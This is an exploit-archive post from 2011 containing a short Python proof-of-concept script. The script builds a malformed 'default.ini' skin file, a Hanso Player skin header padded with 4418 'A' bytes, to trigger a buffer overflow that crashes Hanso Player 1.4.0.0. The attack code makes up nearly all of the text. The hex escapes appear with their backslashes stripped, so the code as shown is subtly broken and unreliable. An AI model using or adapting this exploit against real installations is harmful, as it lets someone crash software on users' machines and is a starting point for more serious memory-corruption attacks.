Home / os / win7

Hanso Player 1.4.0.0 Buffer Overflow

Posted on 08 February 2011

# Exploit Title: Hanso Player 1.4.0.0 Buffer Overflow - DoS Skinfile # Date: 05.02.2011 # Author: Dame Jovanoski(badc0re) # Software Link: http://www.hansotools.com/downloads/hanso-player-setup.exe # Version: 1.4.0.0 # Tested on: XP sp3 from struct import * import time f=open("default.ini","w") print "Creating expoit." time.sleep(1) print "Creating explot.." time.sleep(1) print "Creating explot..." junk="x41"*4418 head=("x5Bx48x61x6Ex73x6Fx20x50" "x6Cx61x79x65x72x20x53x6B" "x69x6Ex5Dx0A") try: f.write(head+junk) f.close() print "File created" except: print "File cannot be created"

 

TOP